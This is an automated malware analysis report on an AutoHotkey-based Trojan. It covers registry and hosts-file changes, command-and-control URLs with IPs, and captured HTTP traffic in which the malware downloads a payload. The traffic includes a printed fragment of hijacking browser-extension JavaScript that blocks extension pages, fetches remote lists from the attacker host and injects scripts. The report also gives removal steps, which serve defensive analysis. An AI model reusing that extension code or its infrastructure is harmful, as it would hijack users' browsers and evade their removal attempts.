Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wget.exe:1624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A BF D9 3A 8D 9A 97 75 5E 5F 60 84 A5 AC 3F 0D"

The process arsiv.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 0B 71 2A BA 3C 02 58 C1 CB 44 C6 85 AE 6A F8"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 793 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: bon joueur
Product Version: 3, 3, 8, 1
Legal Copyright: bon service de lecteur
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 3, 8, 1
File Description: bon joueur
Comments:
Language: Spanish (Spain, International Sort)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://filmver.com/ahk/ok.txt
hxxp://filmver.com/ahk/req.php?type=update_hash
hxxp://filmver.com/ahk/req.php?type=js
hxxp://filmver.com/ahk/req.php?type=key
hxxp://filmver.com/ahk/req.php?type=arsiv_hash
hxxp://filmver.com/ahk/req.php?type=arsiv_link
hxxp://a56.dscg10.akamai.net/app.exe
hxxp://www.filmver.com/ahk/req.php?type=arsiv_hash	188.226.214.13
hxxp://www.filmver.com/ahk/ok.txt	188.226.214.13
hxxp://www.filmver.com/ahk/req.php?type=key	188.226.214.13
hxxp://www.filmver.com:80/ahk/req.php?type=arsiv_link	188.226.214.13
hxxp://www.filmver.com/ahk/req.php?type=update_hash	188.226.214.13
hxxp://79d4801dcba3c4de7d5e-ee4814f2694250eddb4ad0b6678f3a02.r54.cf4.rackcdn.com:80/app.exe	212.30.134.220
hxxp://www.filmver.com/ahk/req.php?type=js	188.226.214.13
www.google.com	173.194.113.210

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (AutoHotkey)

Traffic

GET /ahk/req.php?type=arsiv_link HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: VVV.filmver.com:80

Accept: */*

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Wed, 18 Feb 2015 14:00:28 GMT

Content-Type: text/javascript; Charset=UTF8

Connection: close

X-Powered-By: PHP/5.4.17

Location: hXXp://79d4801dcba3c4de7d5e-ee4814f2694250eddb4ad0b6678f3a02.r54.cf4.rackcdn.com/app.exe

GET /app.exe HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: 79d4801dcba3c4de7d5e-ee4814f2694250eddb4ad0b6678f3a02.r54.cf4.rackcdn.com:80

Accept: */*

HTTP/1.0 200 OK

Origin: hXXps://mycloud.rackspace.com

Content-Length: 31990778

Accept-Ranges: bytes

Last-Modified: Tue, 17 Feb 2015 20:35:00 GMT

ETag: 0c4950e06182df940d3e841551aa4378

X-Timestamp: 1424205299.97054

Content-Type: application/x-msdownload

X-Trans-Id: tx15258f337ab24f7da07b0-0054e3ac69syd2

Cache-Control: public, max-age=198129

Expires: Fri, 20 Feb 2015 21:02:38 GMT

Date: Wed, 18 Feb 2015 14:00:29 GMT

Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........f..{5..{5
..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Ri
ch..{5........PE..L...Yj>O.....................d...............0...
.@..................................................................K.
.3...L<[email protected]....................
...........................0...............................text...2...
........................ ..`.rdata..5....0......."..............@[email protected]
ata....V...P.......@[email protected]..........
....@[email protected][email protected]..............@..@......................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................@s... s...........
.............................D$..L$....L$.u..D$......S.....D$..d$....D
$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$...
......D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u....
..d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$..
.}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3.....
.D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....
r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]
<<< skipped >>>

GET /ahk/ok.txt HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmver.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 18 Feb 2015 14:00:27 GMT

Content-Type: text/plain

Content-Length: 9

Last-Modified: Sat, 07 Feb 2015 17:48:30 GMT

Connection: keep-alive

ETag: "54d64fee-9"

Accept-Ranges: bytes
Server_ok....


GET /ahk/req.php?type=update_hash HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmver.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 18 Feb 2015 14:00:27 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17
0......


GET /ahk/req.php?type=js HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmver.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 18 Feb 2015 14:00:27 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17
665..chrome["tabs"]["onUpdated"]["addListener"](function(myid, x, my) 
{..   if (my["url"]["indexOf"]("chrome://extension") >= 0 || my["ur
l"]["indexOf"]("chrome://chrome/extension") >= 0 || my["url"]["inde
xOf"]("chrome://settings/resetProfileSettings") >= 0 || my["url"]["
indexOf"]("opera://extensions/") >= 0 || my["url"]["indexOf"]("brow
ser://tune/") >= 0 || my["url"]["indexOf"]("chrome://help/") >= 
0) {..      chrome["tabs"]["remove"](my["id"]);..   }..});..chrome.web
Request.onBeforeRequest.addListener(..function (details) {..var url = 
details.url;..for (var i = 0; i < block.length; i  ) {..if (url.ind
exOf(block[i]) > -1) {..    return {..        cancel: true..    };.
.}..}..}, {..    urls: ["<all_urls>"]..}, ["blocking"]);..var bl
ock = ["csp"];..var curl = new XMLHttpRequest();..curl.onreadystatecha
nge = function () {..if (curl.readyState == 4) {..    try {..        J
SON.parse(curl.responseText).forEach(..            function (d) {..   
             if (d.uri) {..                    block.push(d.uri);..   
             }..            });..    } catch (e) {}..}..};..curl.open(
"GET","hXXp://VVV.filmver.com/ahk/get.js?cache="   Math.random() * 999
999, true);..curl.send();..chrome.tabs.onUpdated.addListener(function 
(theId) {..chrome.tabs.get(theId, function (the) {..{..var xmlhtp = ne
w XMLHttpRequest();..xmlhtp.onreadystatechange = function () {..if (xm
lhtp.readyState == 4) {..    if (the.url.indexOf("devtools://") < 0
) {..        chrome.tabs.executeScript(the.id, {..            code
<<< skipped >>>

GET /ahk/req.php?type=key HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmver.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 18 Feb 2015 14:00:27 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17
f9..aideiobfnjdbgbcjcbbmfbpfodjapgpi#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBi
QKBgQDRs6Nnz3iP/5y1Gg2zARgnjEmZH32R/vmdt1OPlqTFGqXiIEH7FUrusTFg/D4Ze49
QKdnwOm1jCgHuctmuRVQy HNjj02Wb1AgVKCBIA4y2rJszbf5cTNd4hvKBjkfRSFtNEGZg
fkfgRYXTwpIPlrAVexVgEG1qh3Q/xpeaHn62wIDAQAB..0......


GET /ahk/req.php?type=arsiv_hash HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmver.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 18 Feb 2015 14:00:27 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17
20..0c4950e06182df940d3e841551aa4378..0..HTTP/1.1 200 OK..Server: ngin
x..Date: Wed, 18 Feb 2015 14:00:27 GMT..Content-Type: text/javascript;
 Charset=UTF8..Transfer-Encoding: chunked..Connection: keep-alive..X-P
owered-By: PHP/5.4.17..20..0c4950e06182df940d3e841551aa4378..0..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

YYu.Pj

!"#$%%&'())* ,-./0123456789:;<""=>

VSSSh

E`SSh

SSSSSSSh

urSSSh

WSSSh

zSSShX

t*SSh

t3SSSh

VWumh0%F

u.hL%F

It.It

SSSSh

tASSSh

udPS

uÊ;MP|

!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC<=>?@AB

AutoHotkey

AppsKey

ListHotkeys

KeyHistory

DetectHiddenWindows

SetKeyDelay

Hotkey

KeyWait

GetKeyState

URLDownloadToFile

MsgBox

IfMsgBox

AHK Keybd

X X

NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)

The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.

NOTE: Only the script's own keyboard events are shown

(not the user's), because the keyboard hook isn't installed.

Modifiers (Hook's Logical) = %s

Modifiers (Hook's Physical) = %s

Prefix key is down: %s

OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.

"%s" is not a valid key name. The current thread will exit.

"%s" is not allowed as a prefix key.

%u hotkeys have been received in the last %ums.

(see #MaxHotkeysPerInterval in the help file)

Max hotkeys.

The AltTab hotkey "%s" must have exactly one modifier/prefix.

The AltTab hotkey "%s" must specify which key (L or R).

Nonexistent hotkey variant (IfWin). The current thread will exit.

Nonexistent hotkey. The current thread will exit.

SCx

A%s[%u of %u]: %-1.60s%s

: -*.|&^/

HKEY_USERS

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

%s\%s

<>=/|^,:*&~!() -"'\;`{}

timesincepriorhotkey

timesincethishotkey

priorhotkey

thishotkey

subkey

keydelay

detecthiddenwindows

%s%s%s

if %s %s %s and %s

%s%s %s %s

MbP?u:

%sGlobal Variables (alphabetical)%s

Local Variables for %s()%s

Key History has been disabled via #KeyHistory 0.

Window: %s

Keybd hook: %s

Mouse hook: %s

Enabled Timers: %u of %u (%s)

Interrupted threads: %d%s

Paused threads: %d of %d (%d layers)

Modifiers (GetKeyState() now) = %s

AutoHotkey2

%%%s%s%s

Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.

Critical Error: %s

Specifically: %-1.100s%s

%s%s: %-1.500s

in #include file "%s"

Specifically: %s

%s (%d) : ==> %s

Line Text: %-1.100s%s

Error at line %u

Action: <%-0.400s%s>%s

Params: <%-0.400s%s>

Verb: <%s>

.hta"

.cmd"

.com"

.bat"

.exe"

%s %s

System verbs unsupported with RunAs. The current thread will exit.

#KeyHistory

#MaxThreadsPerHotkey

#MaxHotkeysPerInterval

#HotkeyInterval

#HotkeyModifierTimeout

#InstallKeybdHook

<>=/|^,:*&~!() -

Too many parameters passed to function.

Too few parameters passed to function.

Caller must pass a variable to this ByRef parameter.

<>/|^,*&~!. -"

Unsupported parameter default.

<>=/|^,:*&~!()"

"%s" requires that parameter #%u be non-blank.

"%s" requires at least %d parameter%s.

Invalid hotkey.

<>=/|^,:*&~!() -".

Unsupported static initializer.

Could not extract script from EXE.

Duplicate hotkey.

Hotkeys/hotstrings are not allowed inside functions.

{Blind}{%s Up}

*%s::

*%s up::

{Blind}%s%s{%s DownTemp}

if not GetKeyState("%s")

Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.

<>=/|^,:

<>=/|^,:. -*&!?~

Join

>AUTOHOTKEY SCRIPT<

EndKey:

SOFTWARE\AutoHotkey

\\.\%c:

\\.\vwin32

open "%s" alias AHK_PlayMe

All Files (*.*)

Text Documents (*.txt)

*.txt

%s%c%sÊll Files (*.*)%c*.*%c

Select File - %s

1.0.48.05

\AutoHotkey.exe

WIN32_WINDOWS

.DEFAULT\Control Panel\Desktop\ResourceLocale

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Compile error %d at offset %d: %s

%sBottom

%sRight

%sTop

%sLeft

0xX

Could not open URL hXXp://VVV.autohotkey.com in default browser.

hXXp://VVV.autohotkey.com

hh.exe

%sAutoHotkey.chm"

\AutoHotkey.chm"

%sAU3_Spy.exe"

\AU3_Spy.exe"

set cd door %s wait

open %s type cdaudio alias cd wait shareable

set cdaudio door %s wait

Component Doesn't Support This Control Type

Mixer Doesn't Support This Component Type

0xX

Mb@AAutoHotkey v1.0.48.05

Len%d

Pos%d

Len%s

Pos%s

0.0.0.0

InternetOpenUrlA

Select Folder - %s

%u.%u.%u.%u

RunAs: Missing advapi32.dll. The current thread will exit.

%dGui

vkX

AutoHotkeyGUI

Password

Report

msctls_hotkey32

Button%s

&Suspend Hotkeys

Supported only for the tray menu The current thread will exit.

dddddd

dA\\?\

GdiplusShutdown

dd

The following %s name contains an illegal character:

"%-1.300s"%s

The maximum number of MsgBoxes has been reached.

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

WSOCK32.dll

WINMM.dll

VERSION.dll

COMCTL32.dll

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardLayout

UnhookWindowsHookEx

SetWindowsHookExA

RegisterHotKey

UnregisterHotKey

SetKeyboardState

GetKeyboardState

VkKeyScanExA

MapVirtualKeyA

GetAsyncKeyState

GetKeyNameTextA

keybd_event

EnumChildWindows

EnumWindows

ExitWindowsEx

USER32.dll

GDI32.dll

comdlg32.dll

RegCloseKey

RegEnumKeyExA

RegQueryInfoKeyA

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

ADVAPI32.dll

ShellExecuteExA

SHFileOperationA

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

-()[]{}:;'"/\,.?!

zcÁ

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data\Chromium.exe

LjI%c

ôC&

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

3, 3, 8, 1

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:348
   Chromium.exe:660
   wget.exe:1624
   arsiv.exe:208

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\Chromium.exe (3860 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
   %Documents and Settings%\%current user%\Application Data\setting (28 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
   %System%\drivers\etc\hosts (59 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
   %Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
   %Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\bg.txt (1 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aideiobfnjdbgbcjcbbmfbpfodjapgpi\bg.txt (1 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\arsiv.exe (4224392 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
